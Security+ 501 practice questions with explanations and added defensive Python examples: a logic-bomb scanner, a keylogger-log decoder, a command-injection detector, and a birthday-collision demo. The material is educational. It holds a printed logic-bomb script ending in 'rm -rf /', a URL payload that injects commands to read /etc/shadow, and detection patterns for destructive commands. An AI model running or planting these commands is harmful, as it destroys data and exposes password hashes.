Security+ 501 - Chapter 2
An information security specialist is reviewing the following output from a Linux server. user@server:~$ crontab -l 5 * * * * /usr/local/bin/backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd then rm -rf / fi Based on the above information, which of the following types of malware was installed on the server? A. Backdoor B. Rootkit C. Logic bomb D. Ransomware E. Trojan
C. Logic bomb. crontab -l lists the cron jobs of the current user. The schedule field 5 * * * * means minute 5 of every hour, every day (not once a day at 00:05): the five fields are minute, hour, day of month, month and day of week, and an asterisk matches every value. Every hour cron runs /usr/local/bin/backup.sh, which despite its name backs nothing up. The #!/bin/bash header line tells the kernel which interpreter to run the file with. The body is a single test: grep --quiet joeuser /etc/passwd prints nothing (--quiet) and exits 0 only if an account named joeuser still exists; the leading ! inverts that result. So if joeuser is ever removed from the system, the script runs rm -rf /, which recursively (-r) and without prompting (-f) deletes every file the job's owner is allowed to delete. A destructive payload that stays dormant until a condition is met, here the removal of a specific account (the classic disgruntled-administrator trigger), is a logic bomb. It is not a backdoor (it grants no access), not a rootkit (it hides nothing) and not ransomware (nothing is encrypted for payment).
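As an added example (not part of the original question set), the following script lists cron jobs and checks each scheduled script for the logic-bomb pattern above: a destructive command that only runs when an if-test holds. The crontab text and script contents are constructed from the question; the path and account name are only sample data.

```python
# Added example (not part of the original question set): a small scanner
# that lists cron jobs and checks each scheduled script for the logic-bomb
# pattern above: a destructive command that only runs when a condition
# holds. The crontab text and script contents below are constructed from
# the question; paths and names are only for the example.
import re

CRONTAB = "5 * * * * /usr/local/bin/backup.sh\n"

SCRIPTS = {
    "/usr/local/bin/backup.sh": (
        "#!/bin/bash\n"
        "if ! grep --quiet joeuser /etc/passwd\n"
        "then\n"
        "    rm -rf /\n"
        "fi\n"
    ),
}

# Commands that destroy the system rather than a specific path.
DESTRUCTIVE = re.compile(
    r"\brm\s+-[A-Za-z]*r[A-Za-z]*\b.*\s/(\s|$)"   # rm -rf /  (root, not /some/path)
    r"|\bmkfs(\.\w+)?\b"                          # reformat a filesystem
    r"|\bdd\b.*\bof=/dev/"                        # overwrite a block device
)


def describe_schedule(fields):
    """Render the five cron fields (min hour dom month dow) in words."""
    minute, hour, dom, month, dow = fields
    if hour == "*" and dom == "*" and month == "*" and dow == "*":
        return f"every hour at minute {minute}"
    if (dom == "*" and month == "*" and dow == "*"
            and minute.isdigit() and hour.isdigit()):
        return f"every day at {int(hour):02d}:{int(minute):02d}"
    return f"min={minute} hour={hour} dom={dom} month={month} dow={dow}"


def parse_crontab(text):
    """Return (schedule description, command) for each active crontab line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 5)
        if len(parts) == 6:
            entries.append((describe_schedule(parts[:5]), parts[5]))
    return entries


def find_logic_bomb(script):
    """Return (condition, command) if a destructive command is guarded by an
    if-test, otherwise None. Handles both 'if cond; then' on one line and a
    separate 'then' line."""
    condition = None
    for raw in script.splitlines():
        line = raw.strip()
        if line.startswith("if "):
            condition = re.sub(r";?\s*then$", "", line[3:]).strip()
        elif line == "fi":
            condition = None
        elif condition is not None and DESTRUCTIVE.search(line):
            return condition, line
    return None


def scan(crontab, scripts):
    """Cross-reference cron jobs with script contents; return findings as
    (schedule, script path, trigger condition, destructive command)."""
    findings = []
    for schedule, command in parse_crontab(crontab):
        path = command.split()[0]
        if path in scripts:
            hit = find_logic_bomb(scripts[path])
            if hit:
                findings.append((schedule, path) + hit)
    return findings


if __name__ == "__main__":
    for f in scan(CRONTAB, SCRIPTS):
        print("schedule: %s\nscript:   %s\ntrigger:  %s\npayload:  %s" % f)
```

On a real host the scripts dictionary would be filled by reading each command's target file; the scanner deliberately reports the trigger condition alongside the payload, because the condition (here, the disappearance of a named account) is what distinguishes a logic bomb from an ordinary destructive mistake.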
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? A. Botnet B. Ransomware C. Polymorphic malware D. Armored virus
A. Botnet A botnet is a collection of internet-connected devices, which may include PCs, servers, mobile devices and internet of things devices that are infected and controlled by a common type of malware. Users are often unaware of a botnet infecting their system. Infected devices are controlled remotely by threat actors, often cybercriminals, and are used for specific functions, so the malicious operations stay hidden to the user. Botnets are commonly used to send email spam, engage in click fraud campaigns and generate malicious traffic for distributed denial-of-service attacks
Which of the following attacks specifically impact data availability? A. DDoS B. MITM C. Rootkit D. Trojan
A. DDoS. A distributed denial-of-service (DDoS) attack is one in which many compromised systems (typically a botnet) attack a single target, such as a server, website or other network resource, and deny service to its legitimate users. The flood of incoming messages, connection requests or malformed packets exhausts bandwidth, connection tables or CPU until the target slows, crashes or shuts down. Of the options, only DDoS targets availability directly: a man-in-the-middle attack compromises confidentiality and integrity, while a rootkit or Trojan is malware whose aim is access and persistence.
A computer on a company network was infected with a zero-day exploit after an employee accidentally opened an email that contained malicious content. The employee recognized the email as malicious and was attempting to delete it, but accidentally opened it. Which of the following should be done to prevent this scenario from occurring again in the future? A. Install end-point protection on all computers that access web email B. Set the email program default to open messages in plain text C. Install host-based firewalls on all computers that have an email client installed D. Create new email spam filters to delete all messages from that sender
A. Install end-point protection on all computers that access web email. Endpoint protection (endpoint security) refers to centrally managed agents on servers, workstations and mobile devices that combine signature-based anti-virus with behavioural and exploit mitigation, so they can block an unknown (zero-day) exploit by what it does rather than by a signature that does not yet exist. Traditional anti-virus alone cannot stop targeted attacks, advanced persistent threats or zero-days. Opening mail in plain text reduces exposure to HTML and script content but not to a malicious attachment; a host firewall controls network connections, not what a mail client renders; and a filter on one sender address does nothing against the next sender.
A security administrator is reviewing the following network capture: 192.168.20.43:2043 -> 10.234.60.21:80 POST "192.168.20.43 https://www.banksite.com<ENTER>JoeUsr<BackSPACE>erPassword<ENTER>" Which of the following malware is MOST likely to generate the above information? A. Keylogger B. Ransomware C. Adware D. Logic bomb
A. Keylogger A keylogger is a program that records the keystrokes on a computer. It does this by monitoring a user's input and keeping a log of all keys that are pressed. The log may be saved to a file or even sent to another machine over a network or the Internet. Keylogger programs are often deemed spyware because they usually run without the user knowing it. They can be maliciously installed by hackers to spy on what a user is typing. By examining the keylog data, it may be possible to find private information such as a username and password combination. Therefore, keyloggers can be a significant security risk if they are unknowingly installed on a computer
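As an added example (not part of the original question set), the following decoder turns the kind of keystroke log shown in the capture above into what the victim actually submitted, applying <BackSPACE> and splitting fields on <ENTER> and <TAB>, which is the first thing an analyst does with exfiltrated keylogger data. The capture string is constructed from the question.

```python
# Added example (not part of the original question set): decode the kind of
# keystroke log shown in the capture above into what the victim actually
# submitted, honouring BackSPACE and splitting fields on ENTER/TAB. The
# capture string is constructed from the question.
import re

CAPTURE = "https://www.banksite.com<ENTER>JoeUsr<BackSPACE>erPassword<ENTER>"

# Either a named key in angle brackets or a single literal character.
TOKEN = re.compile(r"<([A-Za-z]+)>|(.)", re.DOTALL)

# Keys that end a field; other non-printing keys (SHIFT, CTRL, ...) are ignored.
FIELD_BREAK = {"ENTER", "RETURN", "TAB"}


def decode_keystrokes(log):
    """Return the list of fields the user submitted, in order."""
    fields, buf = [], []
    for key, ch in TOKEN.findall(log):
        if ch:                       # literal character
            buf.append(ch)
            continue
        name = key.upper()           # loggers vary in case: <BackSPACE>, <ENTER>
        if name == "BACKSPACE":
            if buf:
                buf.pop()            # erase the last character actually typed
        elif name in FIELD_BREAK:
            fields.append("".join(buf))
            buf = []
    if buf:
        fields.append("".join(buf))  # trailing text that was never submitted
    return fields


def suspected_credentials(fields):
    """Pair each URL field with the non-empty fields typed after it: the
    pattern a keylogger operator looks for in a capture."""
    result, current = {}, None
    for f in fields:
        if re.match(r"https?://", f):
            current = f
            result[current] = []
        elif current is not None and f:
            result[current].append(f)
    return result


if __name__ == "__main__":
    fields = decode_keystrokes(CAPTURE)
    print(fields)
    print(suspected_credentials(fields))
```

Note what the decoder reveals: the raw string "JoeUsr<BackSPACE>erPassword" was submitted as a single field, JoeUserPassword, so the victim corrected a typo mid-entry; without replaying the backspace an analyst would misread both the username and the password.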
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Privilege escalation B. Buffer overflow C. Pivoting D. Process affinity
A. Privilege escalation. Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or application to gain access to resources that are normally protected from that application or user. Vertical escalation takes a low-privileged interactive session (a shell, a logged-in desktop) to administrator, root or SYSTEM; horizontal escalation reaches another user's data at the same level. A buffer overflow is one mechanism that can achieve it, pivoting is using a compromised host to reach other hosts, and process affinity is a CPU-scheduling setting.
An employee receives an email, which appears to be from the Chief Executive Officer (CEO), asking for a report of security credentials for all users. Which of the following types of attack is MOST likely occurring? A. Spear phishing B. Policy violation C. Whaling D. Social engineering
A. Spear phishing Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization or business. Although often intended to steal data for malicious purposes, cybercriminals may also intend to install malware on a targeted user's computer
Which of the following vulnerability types would the type of hacker known as a script kiddie be MOST dangerous against? A. Unpatched exploitable Internet-facing services B. Unencrypted backup tapes C. Passwords written on the bottom of a keyboard D. Misplaced hardware token
A. Unpatched exploitable Internet-facing services. A script kiddie is an attacker with little skill of their own who runs exploit scripts and tools written by others, often without understanding how they work, and who rejects the ethical principles (pursuit of knowledge, respect for skill, self-education) that more serious hackers claim. Because they cannot write exploits, they depend on public tooling for known vulnerabilities, so their natural prey is an Internet-facing service that has not been patched against a vulnerability for which an exploit is already published: scanning for it and running the exploit is fully automated. The other options require physical access or inside knowledge that a remote, low-skill attacker does not have. Inexperience does not make them harmless: a public exploit against an unpatched server does the same damage regardless of who launches it, and the criminal liability is the same.
Which of the following attack types is being carried out where a target is being sent unsolicited messages via Bluetooth? A. War chalking B. Bluejacking C. Bluesnarfing D. Rogue tethering
B. Bluejacking Bluejacking is a hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, the hacker scans his surroundings with a Bluetooth enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices
A company's user lockout policy is enabled after five unsuccessful login attempts. The help desk notices a user is repeatedly locked out over the course of a workweek. Upon contacting the user, the help desk discovers the user is on vacation and does not have network access. Which of the following types of attacks are MOST likely occurring? (Select two.) A. Replay B. Dictionary C. Rainbow tables D. Brute force E. Pass the hash
B. Dictionary & D. Brute force. The user is on vacation with no network access, so the repeated lockouts are caused by someone else submitting wrong passwords against the account: an online password-guessing attack. A brute-force attack tries every candidate in the key space (all character combinations up to some length, "a", "aa", "aaa" and so on); a dictionary attack tries only words and phrases from a list, usually with common variations such as appended digits. Both generate the stream of failed logins that trips a five-attempt lockout. A replay or pass-the-hash attack reuses captured authentication material and would succeed or fail without repeated wrong guesses, and a rainbow table is an offline attack on a captured hash that never touches the login interface. Lockout policies exist precisely to make online guessing impractical: a cracker that can test thousands of candidates per minute offline gets only five tries per lockout window online, which is why the attack shows up as a week of lockouts rather than a compromise.
An attacker wearing a building maintenance uniform approached a company's receptionist asking for access to a secure area. The receptionist asks for identification and a building access badge, and checks the company's list of approved maintenance personnel prior to granting physical access to the secure area. The controls used by the receptionist are in place to prevent which of the following types of attacks? A. Shoulder surfing B. Impersonation C. Tailgating D. Hoax
B. Impersonation Impersonation is one of several social engineering tools used to gain access to a system or network in order to commit fraud, industrial espionage or identity theft. Impersonation differs from other forms of social engineering because it occurs in person, rather than over the phone or through email
While performing surveillance activities, an attacker determines that an organization is using 802.1X to secure LAN access. Which of the following attack mechanisms can the attacker utilize to bypass the identified network security? A. Pharming B. MAC spoofing C. ARP poisoning D. Xmas attack
B. MAC spoofing. Every network interface has a Media Access Control (MAC) address, a 48-bit (6-byte) identifier written as six hexadecimal byte pairs, for example 00:81:41:fe:ad:7e; the first 24 bits are an organizationally unique identifier assigned to the manufacturer by the IEEE and the last 24 bits are assigned by that manufacturer. The address is burned into the hardware, but the operating system can present a different one on the wire, and doing so is MAC spoofing. Spoofing in general means forging an address in one of the network's addressing systems (MAC, IP, DNS or ARP) to conceal the attacker's identity or impersonate another host; it has legitimate troubleshooting uses but is far more often used to get into systems the attacker is not authorized for. 802.1X port-based access control makes the switch authenticate a supplicant before the port passes traffic, but many deployments must exempt devices that cannot run a supplicant (printers, IP phones, cameras) by whitelisting their MAC addresses, and an authenticated port may be shared with a hub or a daisy-chained phone. Tools exist to locate such non-802.1X hosts on a subnet and clone their MAC addresses, so that the attacker's machine appears to the switch as an already-authenticated device. Pharming and ARP poisoning presuppose network access, and an Xmas scan is reconnaissance, not a bypass.
Which of the following BEST describes an attack where communications between two parties are intercepted and forwarded to each party with neither party being aware of the interception and potential modification to the communications? A. Spear phishing B. Man-in-the-middle C. URL hijacking D. Transitive access
B. Man-in-the-middle A man-in-the-middle (MITM) attack is a form of eavesdropping where communication between two users is monitored and modified by an unauthorized party. Generally, the attacker actively eavesdrops by intercepting a public key message exchange and retransmits the message while replacing the requested key with his own. In the process, the two original parties appear to communicate normally. The message sender does not recognize that the receiver is an unknown attacker trying to access or modify the message before retransmitting to the receiver. Thus, the attacker controls the entire communication
Refer to the following code: public class rainbow { public static void main(String[] args) { Object blue = null; blue.hashCode(); } } Which of the following vulnerabilities would occur if this is executed? A. Pointer dereference B. Missing null check C. Page exception D. NullPointerException
B. Missing null check. The code is Java (public static void main(String[] args) and a hashCode() call on an Object are Java idioms, not C or C++). blue is assigned null and immediately dereferenced, so the JVM throws a NullPointerException. That exception is the runtime symptom, not the vulnerability class; the underlying weakness is a null pointer dereference caused by a missing null check (CWE-476): the program uses a reference without first verifying that it is non-null. In real code the null usually comes from a call that can return null (a lookup that finds nothing, a failed allocation, a missing request header) whose return value the programmer never checks. Almost every serious attack on software begins with the violation of a programmer's assumption, and two assumptions that are easy to spot are "this call can never fail" and "it doesn't matter if this call fails"; ignoring a return value states one of them implicitly. In a managed language the result is a crash, which is a denial of service; in C or C++, where nothing checks the dereference at run time, it can become an exploitable memory-safety bug. "Pointer dereference" is too generic (every pointer use is one) and a "page exception" is a CPU-level fault, not a vulnerability type.
An administrator discovers the following log entry on a server: Nov 12 2013 00:23:45 httpd[2342]: GET /app2/prod/proc/process.php?input=change;cd%20../../../etc;cat%20shadow Which of the following attacks is being attempted? A. Buffer overflow B. Password attack C. Command injection D. Cross-site scripting
C. Command injection. URL-decode the request (%20 is a space) and the parameter reads input=change;cd ../../../etc;cat shadow. The semicolon is a shell command separator: if process.php passes the input parameter to a shell (for example through system() or exec()), the shell runs change, then cd ../../../etc, then cat shadow, returning the contents of /etc/shadow to the attacker. That is command injection: user-controlled data is interpreted as part of a command instead of as data. The attacker's objective is a password attack, since /etc/shadow holds the password hashes (and expiry data) that the world-readable /etc/passwd no longer contains and is readable only by root, and cracked hashes with John the Ripper or Hashcat can be reused to escalate privileges or pivot to other hosts where the same login exists, but that is the follow-on activity, not the attack in the log. A buffer overflow would show a long run of filler bytes, and cross-site scripting would show script or HTML aimed at another user's browser. The defences are to avoid passing user input to a shell at all and, where a command is unavoidable, to validate the parameter against a strict allow-list and pass it as a separate argument rather than as part of a command string.
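As an added example (not part of the original question set), the following code pulls the request out of the log line above, URL-decodes its parameters, flags the ones that carry shell metacharacters, and places the vulnerable way of building the command beside a hardened one. The log line, the process.php parameter name and the /usr/local/bin/process binary are constructed for the example.

```python
# Added example (not part of the original question set): pull the request
# out of the log line above, URL-decode its parameters, flag the ones that
# carry shell metacharacters, and contrast the vulnerable way of building
# the command with a hardened one. The log line, the process.php parameter
# name and the /usr/local/bin/process binary are constructed for the example.
import re
from urllib.parse import unquote_plus, urlsplit

LOG_LINE = ("Nov 12 2013 00:23:45 httpd[2342]: GET "
            "/app2/prod/proc/process.php?input=change;cd%20../../../etc;cat%20shadow")

# Characters that change how a POSIX shell parses a command line.
SHELL_META = re.compile(r"[;&|`\n]|\$\(|\$\{")
# What a legitimate value of the parameter is allowed to look like.
ALLOWED_INPUT = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def extract_request(line):
    """Return (method, path-with-query) from an httpd-style log line."""
    m = re.search(r"\b(GET|POST|PUT|DELETE)\s+(\S+)", line)
    return (m.group(1), m.group(2)) if m else None


def parse_query(query):
    """Decode name=value pairs separated by '&'. Decoding is done here rather
    than with urllib's parse_qs so a ';' inside a value is never treated as
    a pair separator and survives for inspection."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def injected_params(path):
    """Return {parameter: [decoded values that contain shell metacharacters]}."""
    params = parse_query(urlsplit(path).query)
    return {n: [v for v in vs if SHELL_META.search(v)]
            for n, vs in params.items() if any(SHELL_META.search(v) for v in vs)}


def vulnerable_command(user_input):
    """VULNERABLE: the command line that system()/shell=True would hand to
    /bin/sh; a ';' in user_input starts a second command."""
    return f"/usr/local/bin/process --mode {user_input}"


def hardened_argv(user_input):
    """Hardened: validate against an allow-list and return an argv list to be
    run without a shell (subprocess.run(argv) with shell=False), so the value
    can only ever be a single argument, never a second command."""
    if not ALLOWED_INPUT.match(user_input):
        raise ValueError(f"rejected input parameter: {user_input!r}")
    return ["/usr/local/bin/process", "--mode", user_input]


if __name__ == "__main__":
    method, path = extract_request(LOG_LINE)
    print(method, path)
    hits = injected_params(path)
    print(hits)
    print("shell would run:", vulnerable_command(hits["input"][0]))
    try:
        hardened_argv(hits["input"][0])
    except ValueError as e:
        print("blocked:", e)
```

The detection regex is a triage aid, not a complete parser of shell syntax; the real fix is the argv form in hardened_argv, which never lets the parameter reach a shell.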
Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host? A. Sniffing B. Remote exploit C. Amplification D. Man-in-the-middle
B. Remote exploit A remote exploit is a malicious action that targets one or a network of computers. The remote attack does not affect the computer the attacker is using. Instead, the attacker will find vulnerable points in a computer or network's security software to access the machine or system. The main reasons for remote attacks are to view or steal data illegally, introduce viruses or other malicious software to another computer or network or system, and cause damage to the targeted computer or network.
An attacker uses a network sniffer to capture the packets of a transaction that adds $20 to a gift card. The attacker then uses a function of the sniffer to push those packets back onto the network again, adding another $20 to the gift card. This can be done many times. Which of the following describes this type of attack? A. Buffer overflow attack B. Replay attack C. Smurf attack D. Integer overflow attack E. Cross-site scripting attack
B. Replay attack. A replay attack is a network attack in which an attacker captures a valid data transmission and fraudulently delays or repeats it. The recorded traffic is retransmitted by the attacker (or, in some variants, by the original sender under the attacker's control) so that the receiving system processes it again as if it were a fresh, legitimate request; the participants believe they have completed a normal transaction. Here the gift-card top-up is replayed repeatedly, crediting $20 each time. Replay is defeated by making each message single-use: nonces, sequence numbers, timestamps and session-bound authentication such as TLS. No overflow or script injection is involved, and a smurf attack is an ICMP amplification denial of service.
A system administrator is reviewing the following information from a compromised server.
Process | DEP | Local Address | Remote Address
LSASS | YES | 0.0.0.0 | 10.210.100.62
APACHE | NO | 0.0.0.0 | 10.130.210.20
MySQL | NO | 127.0.0.1 | 127.0.0.1
TFTP | YES | 192.168.1.10 | 10.34.221.96
Given the above information, which of the following processes was MOST likely exploited via remote buffer overflow attack? A. MySQL B. TFTP C. Apache D. LSASS
C. Apache. A remote buffer overflow needs two things: a process that accepts input from the network, and no mitigation that stops the overflowed buffer from being executed. MySQL is bound to 127.0.0.1 and its only connection is from 127.0.0.1, so it is not reachable remotely. LSASS and TFTP both have DEP (Data Execution Prevention) enabled, which marks stack and heap pages non-executable so the classic overflow that drops shellcode on the stack fails. Apache listens on 0.0.0.0 (every interface), has a connection from an outside address, and has DEP disabled, so it is the most likely victim. The question asks which process was most likely exploited, not which service is the most dangerous in general: TFTP (UDP port 69, no authentication, simple GET and PUT of files, with a client present on almost every operating system) is a favourite post-exploitation tool for moving password-dump utilities onto a compromised host and pulling the hashes back out for offline cracking, but with DEP on it is the less likely overflow target here.
Anne, the Chief Executive Officer (CEO), has reported that she is getting multiple telephone calls from someone claiming to be from the helpdesk. The caller is asking to verify her network authentication credentials because her computer is broadcasting across the network. This is MOST likely which of the following types of attacks? A. Spim B. Vishing C. Scareware D. Impersonation
B. Vishing. Vishing (voice phishing) is phishing carried out over the telephone, increasingly over VoIP because caller ID is easy to spoof and calls are cheap: the caller purports to be from a trusted party (here the help desk) and uses a pretext, "your computer is broadcasting across the network", to talk the victim into revealing credentials, bank details or card numbers. It involves impersonation, but the specific attack type for a credential-harvesting phone call is vishing; spim is spam over instant messaging and scareware is software that frightens the user into buying or installing something.
A security guard has informed the Chief Information Security Officer that a person with a tablet has been walking around the building. The guard also noticed strange white markings in different areas of the Parking lot. The person is attempting which of the following types of attacks? A. Packet sniffing B. War chalking C. Near field communication D. Jamming
B. War chalking War chalking refers to drawing symbols in public spaces to denote an open Wi-Fi wireless network in a public space. War chalking provides information about the type of wireless connection being used, which may be open node, closed node or wired equivalent privacy (WEP) node. This may attract hackers and make them aware of the Wi-Fi hot spot and its security. Hackers may use this information to attack the Wi-Fi network
An attacker discovers a new vulnerability in an enterprise application. The attacker takes advantage of the vulnerability by developing new malware. After installing the malware, the attacker is provided with access to the infected machine. Which of the following is being described? A. Remote code execution B. Zero-day exploit C. Command injection D. Session hijacking
B. Zero-day exploit. A zero-day vulnerability is a flaw unknown to the vendor (and usually to defenders), so no patch or signature exists for it; it can do damage well before anyone realizes something is wrong, because there is nothing to detect it against. A zero-day exploit is the code that takes advantage of that flaw, and a zero-day attack is its use in the wild before the developer has had any days to fix it, hence the name. Here the attacker discovers the flaw, writes malware that exploits it and uses it to gain access; the defining feature is that the vulnerability was new. Remote code execution or command injection might describe the exploit's mechanism, but the scenario does not say which, and session hijacking is unrelated.
Recently several employees were victims of a phishing email that appeared to originate from the company president. The email claimed the employees would be disciplined if they did not click on a malicious link in the message. Which of the following principles of social engineering made this attack successful? A. Spamming B. Scarcity C. Authority D. Social proof
C. Authority Authority can be construed to mean many different things. Within the context of Social Engineering, there are different types of Authority. Authority and power are separate but related concepts. While power is the possession of control, authority or influence over others, authority refers to the right to exercise that power. Authority is used within Social Engineering in order to gain access to property or information. Different types of Authority can be used, including: Legal, Organizational and Social
Ann, an employee in the payroll department, has contacted the help desk citing multiple issues with her device, including: slow performance; Word documents, PDFs and images no longer opening; a pop-up. Ann states the issues began after she opened an invoice that a vendor emailed to her. Upon opening the invoice, she had to click through several security warnings to view it in her word processor. With which of the following is the device MOST likely infected? A. Spyware B. Crypto-malware C. Backdoor D. Rootkit
B. Crypto-malware. All three symptoms point to ransomware that encrypts files: documents, PDFs and images that no longer open have had their contents replaced with ciphertext (often under a renamed extension); the pop-up is the ransom note; and the slow performance is the encryption routine working through the disk in the background. The delivery is the classic one, a malicious "invoice" document carrying a macro or exploit, and the security warnings Ann clicked through were the word processor asking whether to enable active content. Spyware would stay silent, a backdoor provides remote access rather than breaking files, and a rootkit hides itself rather than announcing itself with a pop-up.
A web application is configured to target browsers and allow access to bank accounts to siphon money to a foreign account. This is an example of which of the following attacks? A. SQL injection B. Header manipulation C. Cross-site scripting D. Flash cookie exploitation
C. Cross-site scripting Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page
Which of the following are MOST susceptible to birthday attacks? A. Encryption passwords B. Digital certificates C. Hashed passwords D. One time passwords
C. Hashed passwords. The birthday attack is a cryptanalytic technique for finding collisions in a hash function. If a hash function returns one of k equally likely values for a random input, then after evaluating it on about 1.2·√k different inputs it is likely that two of them produced the same output (a collision); the name comes from the birthday paradox, where a room of only 23 people gives an even chance that two share a birthday. For an n-bit hash, k = 2^n and a collision costs about 2^(n/2) evaluations instead of the 2^n of a brute-force preimage search, which is why short digests such as MD5's 128 bits are no longer considered collision resistant. Birthday attacks are therefore a class of brute-force technique aimed at anything whose security rests on a hash function; among the options, hashed passwords are the one where a colliding input would be accepted in place of the original.
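As an added example (not part of the original question set), the following code checks the 1.2·√k bound empirically by searching for collisions in a hash truncated to n bits, so that k = 2^n. The truncation of SHA-256 stands in for a short hash and the counter-derived inputs are constructed so the run is reproducible.

```python
# Added example (not part of the original question set): check the
# 1.2*sqrt(k) birthday bound empirically by searching for collisions in a
# hash truncated to n bits, so that k = 2**n. Inputs are counter-derived so
# the run is reproducible; truncating SHA-256 to a few bits stands in for a
# short hash and is only for the example.
import hashlib
import math


def truncated_hash(data, bits):
    """Leading `bits` bits of SHA-256 as an integer: a hash with k = 2**bits outputs."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def birthday_bound(bits):
    """Inputs needed for a collision to be likely: 1.2 * sqrt(k) with k = 2**bits."""
    return 1.2 * math.sqrt(2 ** bits)


def find_collision(bits, prefix=b""):
    """Hash prefix||counter until two inputs share a truncated hash.
    Returns (number of hash evaluations, first input, second input)."""
    seen = {}
    n = 0
    while True:
        msg = prefix + n.to_bytes(4, "big")
        h = truncated_hash(msg, bits)
        if h in seen:
            return n + 1, seen[h], msg
        seen[h] = msg
        n += 1


def average_tries(bits, trials):
    """Mean evaluations to first collision over `trials` independent runs,
    each using a different prefix so the search paths differ."""
    total = sum(find_collision(bits, prefix=t.to_bytes(2, "big"))[0]
                for t in range(trials))
    return total / trials


if __name__ == "__main__":
    for bits in (16, 20, 24):
        avg = average_tries(bits, 10)
        print(f"{bits}-bit hash: k=2^{bits}, 1.2*sqrt(k)={birthday_bound(bits):.0f}, "
              f"observed mean {avg:.0f} evaluations")
```

Doubling the hash length from 16 to 32 bits only multiplies the collision cost by 2^8, not 2^16; that square-root relationship is the whole point of the bound and the reason collision-resistant digests need twice the bit length of the security level they are meant to provide.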
A malicious attacker has intercepted HTTP traffic and inserted an ASCII line that sets the referrer URL. Which of the following is the attacker most likely utilizing? A. Cookie hijacking B. Xml injection C. Header manipulation D. Cross-site scripting
C. Header manipulation. Header manipulation is the insertion of attacker-controlled, unvalidated data into an HTTP request or response header. The Referer header (misspelled that way in the protocol itself) is sent by the client to name the page that linked to the requested resource; like the User-Agent and every other client-supplied header it can be set to anything, because the client, or anyone who can intercept and edit the traffic as here, controls it. Referrer spoofing sends a false value so the site cannot learn where the user really came from, or so that a request passes a check. Some applications inspect Referer to confirm a request came from one of their own pages, for example as a weak CSRF defence; an attacker defeats that by inserting or rewriting the header so the request appears to originate from the expected page. Cookie hijacking targets the Cookie header and a session token, XML injection targets a request body, and cross-site scripting targets another user's browser.
An auditor is reviewing the following output from a password-cracking tool: User1: Password1 User2: Recovery! User3: Alaskan10 User4: 4Private User5: PerForMance2 Which of the following methods did the auditor MOST likely use? A. Brute force B. Rainbow table C. Hybrid D. Dictionary
C. Hybrid A hybrid attack is a blend of both a dictionary attack method as well as brute force attack. This means that while a dictionary attack method would include a wordlist of passwords, the brute-force attack would be applied to each possible password in that list. Hybrid password guessing attacks assume that network administrators push users to make their passwords at least slightly different from a word that appears in a dictionary. Hybrid guessing rules vary from tool to tool, but most mix uppercase and lowercase characters, add numbers at the end of the password, spell the password backward or slightly misspell it, and include characters such as @!# in the mix. Both John the Ripper and Cain & Abel can do hybrid guessing
Which of the following types of attacks precedes the installation of a rootkit on a server? A. DoS B. DDoS C. Privilege escalation D. Pharming
C. Privilege escalation. Rootkits almost without exception run with superuser privileges, the full set of system privileges intended for system administrators and system programmers: root on UNIX and Linux, Administrator and SYSTEM on Windows. Without that level of access a rootkit cannot replace system binaries, load kernel modules or drivers, or hook the system calls it uses to hide itself. A rootkit is not an exploit tool that raises the privilege level of whoever installs it, so an attacker must first escalate, by exploiting one or more vulnerabilities independently of the rootkit, and only then install and run it. Most rootkits are persistent: they survive reboots because their code lives in files on the compromised system. Non-persistent (memory-resident) rootkits exist only in RAM, leave no file on disk, and disappear at the next boot, which makes them harder to find on disk but easier to remove. DoS and DDoS attack availability and pharming redirects users to fraudulent sites; none of them yields the access a rootkit needs.
Which of the following characteristics differentiate a rainbow table attack from a brute force attack? (Select two.) A. Rainbow table attacks do not require access to hashed passwords B. Rainbow table attacks greatly reduce compute cycles at attack time C. Rainbow table attacks bypass maximum failed login restrictions. D. Rainbow table attacks must be performed on the network. E. Rainbow tables must include precomputed hashes
B. Rainbow table attacks greatly reduce compute cycles at attack time. E. Rainbow tables must include precomputed hashes. Attackers rarely sit at a login screen; both of these are offline attacks on a captured hash, run with automation against breached data, so neither is subject to account lockout, which is why option C is true of both and does not differentiate them. The difference is when the hashing work is done. A brute-force attack computes the hash of every candidate password at attack time and compares it with the stolen hash. A rainbow table is a time-memory trade-off: the hashes of a large candidate space are computed once in advance and stored (compressed into chains of alternating hash and reduction steps), and the attack itself is a series of lookups, so it costs storage and precomputation time up front but few compute cycles at attack time. Option A is false, since both attacks need the hashed passwords, and option D is false, since neither touches the network at all.
Which of the following cryptographic attacks would salting of passwords render ineffective? A. Birthday B. Brute force C. Rainbow tables D. Dictionary
C. Rainbow tables A hash table is a large list of pre-computed hashes for commonly used passwords. For a password file without salts, an attacker can go through each entry and look up the hashed password in the hash table or rainbow table. Adding a cryptographic salt to your password hashing function will help defend against the use of rainbow tables to crack passwords in your application.
A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING- hash mismatch: C:\Window\SysWOW64\user32.dll WARNING- hash mismatch: C:\Window\SysWOW64\kernel32.dll Based solely on the above information, which of the following types of malware is MOST likely installed on the system? A. Backdoor B. Trojan C. Rootkit D. Ransomware
